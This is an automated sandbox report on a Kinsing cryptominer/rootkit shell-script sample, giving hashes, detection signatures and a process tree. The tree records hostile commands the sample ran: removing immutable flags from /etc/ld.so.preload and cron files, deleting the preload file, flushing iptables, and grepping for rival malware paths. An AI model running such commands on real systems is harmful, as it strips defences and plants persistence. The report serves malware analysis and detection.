Analysis
-
max time kernel
93s -
max time network
108s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
24/02/2025, 03:47
Static task
static1
Behavioral task
behavioral1
Sample
ca33dab18381c947257bcf5269bb818b733c890e5af6d0048aa5da629545ef14.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
ca33dab18381c947257bcf5269bb818b733c890e5af6d0048aa5da629545ef14.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
ca33dab18381c947257bcf5269bb818b733c890e5af6d0048aa5da629545ef14.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
ca33dab18381c947257bcf5269bb818b733c890e5af6d0048aa5da629545ef14.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
ca33dab18381c947257bcf5269bb818b733c890e5af6d0048aa5da629545ef14.sh
-
Size
15KB
-
MD5
1148f3f35f95c8dd4810d228f1b1c0e9
-
SHA1
bb32c94c2351bd40779a62c222d6d3a8ea9d2401
-
SHA256
ca33dab18381c947257bcf5269bb818b733c890e5af6d0048aa5da629545ef14
-
SHA512
296fb2cf231902bfb1a744518d86513ed60bc08161c2c1da58a2876618e9db40fced8e117afcb5994b03f6a0d05debeeddf9d1e4ff75e1208920b794d06c9cc5
-
SSDEEP
384:r5JxgzLuqlH2wx2vUaQa5/eN86704s80ooJQYgykWT4yCtvUsDjdWOoJwH:trgXux7YJDj8OoJwH
Malware Config
Signatures
-
Kinsing Rootkit
Rootkit reuses the publicly available BEURK rootkit.
-
Kinsing Rootkit payload 1 IoCs
resource yara_rule behavioral3/files/fstream-19.dat family_elf_kinsing_rootkit -
Kinsing family
-
Kinsing payload 1 IoCs
resource yara_rule behavioral3/files/fstream-18.dat family_elf_kinsing_loader -
Kinsing_rootkit family
-
Modifies the dynamic linker configuration file 2 TTPs 1 IoCs
Malware can modify the configuration file of the dynamic linker to preload malicous libraries with every executed process.
description ioc Process File opened for modification /etc/ld.so.preload ca33dab18381c947257bcf5269bb818b733c890e5af6d0048aa5da629545ef14.sh -
File and Directory Permissions Modification 1 TTPs 8 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1718 chmod 1723 chmod 1725 chmod 1731 chmod 1732 chmod 1705 chmod 1707 chmod 1716 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /etc/data/kinsing 1733 ca33dab18381c947257bcf5269bb818b733c890e5af6d0048aa5da629545ef14.sh -
Flushes firewall rules 1 TTPs 1 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
pid Process 735 iptables -
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
pid Process 1453 sudo -
Attempts to change immutable files 50 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
pid Process 1637 xargs 1638 sed 1683 xargs 730 chattr 1486 xargs 1634 xargs 1655 xargs 1491 xargs 1635 sed 1640 xargs 1672 xargs 1613 xargs 1607 xargs 1608 sed 1620 sed 1629 sed 1660 xargs 722 chattr 1462 uname 1507 xargs 1544 xargs 1575 xargs 1631 xargs 1699 xargs 1539 xargs 1563 xargs 1611 sed 1616 xargs 1622 xargs 1625 xargs 1643 xargs 1694 xargs 1532 xargs 1557 xargs 1623 sed 1632 sed 1641 sed 1614 sed 732 chattr 1496 xargs 1501 xargs 1517 xargs 1551 xargs 1569 xargs 1617 sed 1512 xargs 1522 xargs 1527 xargs 1610 xargs 1619 xargs -
Creates/modifies Cron job 1 TTPs 64 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.MRwyWW crontab File opened for modification /var/spool/cron/crontabs/tmp.ad4cWk crontab File opened for modification /var/spool/cron/crontabs/tmp.8htQ4W crontab File opened for modification /var/spool/cron/crontabs/tmp.Sh2C6V crontab File opened for modification /var/spool/cron/crontabs/tmp.gnW4ii crontab File opened for modification /var/spool/cron/crontabs/tmp.qrdhfl crontab File opened for modification /var/spool/cron/crontabs/tmp.E3pSBq crontab File opened for modification /var/spool/cron/crontabs/tmp.aZdmsh crontab File opened for modification /var/spool/cron/crontabs/tmp.rgUJkC crontab File opened for modification /var/spool/cron/crontabs/tmp.NA9BnZ crontab File opened for modification /var/spool/cron/crontabs/tmp.QANBTq crontab File opened for modification /var/spool/cron/crontabs/tmp.pdpIOH crontab File opened for modification /var/spool/cron/crontabs/tmp.ZdRhYS crontab File opened for modification /var/spool/cron/crontabs/tmp.EpsRmk crontab File opened for modification /var/spool/cron/crontabs/tmp.FQYINz crontab File opened for modification /var/spool/cron/crontabs/tmp.c1EVou crontab File opened for modification /var/spool/cron/crontabs/tmp.YVvGQ6 crontab File opened for modification /var/spool/cron/crontabs/tmp.4Qdw65 crontab File opened for modification /var/spool/cron/crontabs/tmp.YimheX crontab File opened for modification /var/spool/cron/crontabs/tmp.47jPtD crontab File opened for modification /var/spool/cron/crontabs/tmp.ZCWu4n crontab File opened for modification /var/spool/cron/crontabs/tmp.5AGZC4 crontab File opened for modification /var/spool/cron/crontabs/tmp.6S6jVv crontab File opened for modification /var/spool/cron/crontabs/tmp.zRvalS crontab File opened for modification /var/spool/cron/crontabs/tmp.TFSXpn crontab File opened for modification /var/spool/cron/crontabs/tmp.WLqSxb crontab File opened for modification /var/spool/cron/crontabs/tmp.yYz901 crontab File opened for modification /var/spool/cron/crontabs/tmp.mvn66z crontab File opened for modification /var/spool/cron/crontabs/tmp.4dayIi crontab File opened for modification /var/spool/cron/crontabs/tmp.8Liesh crontab File opened for modification /var/spool/cron/crontabs/tmp.gHwfwN crontab File opened for modification /var/spool/cron/crontabs/tmp.N51YiO crontab File opened for modification /var/spool/cron/crontabs/tmp.F5LaEu crontab File opened for modification /var/spool/cron/crontabs/tmp.o5GvCS crontab File opened for modification /var/spool/cron/crontabs/tmp.K2aZuM crontab File opened for modification /var/spool/cron/crontabs/tmp.X22Stw crontab File opened for modification /var/spool/cron/crontabs/tmp.40VN1h crontab File opened for modification /var/spool/cron/crontabs/tmp.qzikhw crontab File opened for modification /var/spool/cron/crontabs/tmp.BUUvoC crontab File opened for modification /var/spool/cron/crontabs/tmp.b63z1K crontab File opened for modification /var/spool/cron/crontabs/tmp.KMtD56 crontab File opened for modification /var/spool/cron/crontabs/tmp.ZAgWe0 crontab File opened for modification /var/spool/cron/crontabs/tmp.FoSlX3 crontab File opened for modification /var/spool/cron/crontabs/tmp.IgbbOf crontab File opened for modification /var/spool/cron/crontabs/tmp.jw6dyQ crontab File opened for modification /var/spool/cron/crontabs/tmp.run25Z crontab File opened for modification /var/spool/cron/crontabs/tmp.yhjDg0 crontab File opened for modification /var/spool/cron/crontabs/tmp.YiTHdx crontab File opened for modification /var/spool/cron/crontabs/tmp.pXO7Bd crontab File opened for modification /var/spool/cron/crontabs/tmp.fdxeaM crontab File opened for modification /var/spool/cron/crontabs/tmp.Ur5CcW crontab File opened for modification /var/spool/cron/crontabs/tmp.iHbYQd crontab File opened for modification /var/spool/cron/crontabs/tmp.eXBcSe crontab File opened for modification /var/spool/cron/crontabs/tmp.pyf0IG crontab File opened for modification /var/spool/cron/crontabs/tmp.X2XM5a crontab File opened for modification /var/spool/cron/crontabs/tmp.UMGuxS crontab File opened for modification /var/spool/cron/crontabs/tmp.1biDOc crontab File opened for modification /var/spool/cron/crontabs/tmp.VM5Rwk crontab File opened for modification /var/spool/cron/crontabs/tmp.RSDfhI crontab File opened for modification /var/spool/cron/crontabs/tmp.bb5qar crontab File opened for modification /var/spool/cron/crontabs/tmp.xHAMs8 crontab File opened for modification /var/spool/cron/crontabs/tmp.WeMnO7 crontab File opened for modification /var/spool/cron/crontabs/tmp.MpsOzk crontab File opened for modification /var/spool/cron/crontabs/tmp.xD7Ukf crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Modifies systemd 2 TTPs 1 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
description ioc Process File opened for modification /lib/systemd/system/bot.service ca33dab18381c947257bcf5269bb818b733c890e5af6d0048aa5da629545ef14.sh -
Reads CPU attributes 1 TTPs 64 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill -
Enumerates kernel/hardware configuration 1 TTPs 2 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl -
Process Discovery 1 TTPs 12 IoCs
Adversaries may try to discover information about running processes.
pid Process 1540 ps 1503 ps 1523 ps 1528 ps 1535 ps 1603 ps 1651 ps 1656 ps 1695 ps 1508 ps 1513 ps 1518 ps -
description ioc Process File opened for reading /proc/7/cmdline pkill File opened for reading /proc/16/cmdline pkill File opened for reading /proc/344/status ps File opened for reading /proc/73/cmdline pkill File opened for reading /proc/74/cmdline pkill File opened for reading /proc/391/status pkill File opened for reading /proc/392/status ps File opened for reading /proc/72/stat ps File opened for reading /proc/254/stat ps File opened for reading /proc/718/stat ps File opened for reading /proc/18/stat ps File opened for reading /proc/1532/status ps File opened for reading /proc/683/status pkill File opened for reading /proc/1698/stat ps File opened for reading /proc/692/stat ps File opened for reading /proc/37/cmdline ps File opened for reading /proc/12/status pkill File opened for reading /proc/124/stat ps File opened for reading /proc/4/stat ps File opened for reading /proc/5/stat ps File opened for reading /proc/1/cmdline ps File opened for reading /proc/74/status pkill File opened for reading /proc/124/status pkill File opened for reading /proc/392/cmdline pkill File opened for reading /proc/4/status ps File opened for reading /proc/691/cmdline pkill File opened for reading /proc/1/stat ps File opened for reading /proc/15/status pkill File opened for reading /proc/692/cmdline pkill File opened for reading /proc/125/status pkill File opened for reading /proc/254/cmdline pkill File opened for reading /proc/17/status ps File opened for reading /proc/filesystems ls File opened for reading /proc/71/status pkill File opened for reading /proc/343/status pkill File opened for reading /proc/717/cmdline pkill File opened for reading /proc/7/status ps File opened for reading /proc/10/stat ps File opened for reading /proc/125/cmdline ps File opened for reading /proc/13/status pkill File opened for reading /proc/20/stat ps File opened for reading /proc/74/status pkill File opened for reading /proc/391/status pkill File opened for reading /proc/19/cmdline pkill File opened for reading /proc/345/cmdline pkill File opened for reading /proc/716/cmdline ps File opened for reading /proc/filesystems sed File opened for reading /proc/692/cmdline pkill File opened for reading /proc/74/status pkill File opened for reading /proc/17/status ps File opened for reading /proc/343/status ps File opened for reading /proc/8 ls File opened for reading /proc/23/status pkill File opened for reading /proc/72/cmdline pkill File opened for reading /proc/23/status pkill File opened for reading /proc/21/status pkill File opened for reading /proc/69/status pkill File opened for reading /proc/19/status pkill File opened for reading /proc/391/cmdline pkill File opened for reading /proc/19/cmdline pkill File opened for reading /proc/15/status pkill File opened for reading /proc/19/cmdline pkill File opened for reading /proc/340/stat ps File opened for reading /proc/2/status ps -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1404 ls 1838 sed
Processes
-
/tmp/ca33dab18381c947257bcf5269bb818b733c890e5af6d0048aa5da629545ef14.sh/tmp/ca33dab18381c947257bcf5269bb818b733c890e5af6d0048aa5da629545ef14.sh1⤵
- Modifies the dynamic linker configuration file
- Executes dropped EXE
- Modifies systemd
PID:719 -
/usr/bin/chattrchattr -i /etc/ld.so.preload2⤵
- Attempts to change immutable files
PID:722
-
-
/bin/rmrm -f /etc/ld.so.preload2⤵PID:725
-
-
/usr/bin/chattrchattr -R -ia /var/spool/cron2⤵
- Attempts to change immutable files
PID:730
-
-
/usr/bin/chattrchattr -ia /etc/crontab2⤵
- Attempts to change immutable files
PID:732
-
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
PID:735
-
-
/bin/grepgrep exe2⤵PID:744
-
-
/bin/lsls -latrh /proc/12⤵PID:743
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:749
-
-
/bin/grepgrep exe2⤵PID:754
-
-
/bin/lsls -latrh /proc/102⤵PID:753
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:756
-
-
/bin/grepgrep exe2⤵PID:760
-
-
/bin/lsls -latrh /proc/1092⤵PID:759
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:763
-
-
/bin/grepgrep exe2⤵PID:767
-
-
/bin/lsls -latrh /proc/112⤵PID:766
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:770
-
-
/bin/grepgrep exe2⤵PID:774
-
-
/bin/lsls -latrh /proc/122⤵PID:773
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:777
-
-
/bin/grepgrep exe2⤵PID:780
-
-
/bin/lsls -latrh /proc/1242⤵PID:779
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:782
-
-
/bin/grepgrep exe2⤵PID:785
-
-
/bin/lsls -latrh /proc/1252⤵PID:784
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:787
-
-
/bin/grepgrep exe2⤵PID:791
-
-
/bin/lsls -latrh /proc/132⤵PID:790
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:793
-
-
/bin/grepgrep exe2⤵PID:796
-
-
/bin/lsls -latrh /proc/142⤵PID:795
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:798
-
-
/bin/lsls -latrh /proc/152⤵PID:800
-
-
/bin/grepgrep exe2⤵PID:801
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:803
-
-
/bin/grepgrep exe2⤵PID:806
-
-
/bin/lsls -latrh /proc/1542⤵PID:805
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:808
-
-
/bin/grepgrep exe2⤵PID:811
-
-
/bin/lsls -latrh /proc/162⤵PID:810
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:813
-
-
/bin/grepgrep exe2⤵PID:816
-
-
/bin/lsls -latrh /proc/1612⤵PID:815
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:818
-
-
/bin/grepgrep exe2⤵PID:821
-
-
/bin/lsls -latrh /proc/172⤵PID:820
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:823
-
-
/bin/grepgrep exe2⤵PID:826
-
-
/bin/lsls -latrh /proc/1752⤵PID:825
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:828
-
-
/bin/grepgrep exe2⤵PID:831
-
-
/bin/lsls -latrh /proc/182⤵PID:830
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:833
-
-
/bin/grepgrep exe2⤵PID:836
-
-
/bin/lsls -latrh /proc/192⤵PID:835
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:838
-
-
/bin/grepgrep exe2⤵PID:841
-
-
/bin/lsls -latrh /proc/22⤵PID:840
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:843
-
-
/bin/grepgrep exe2⤵PID:846
-
-
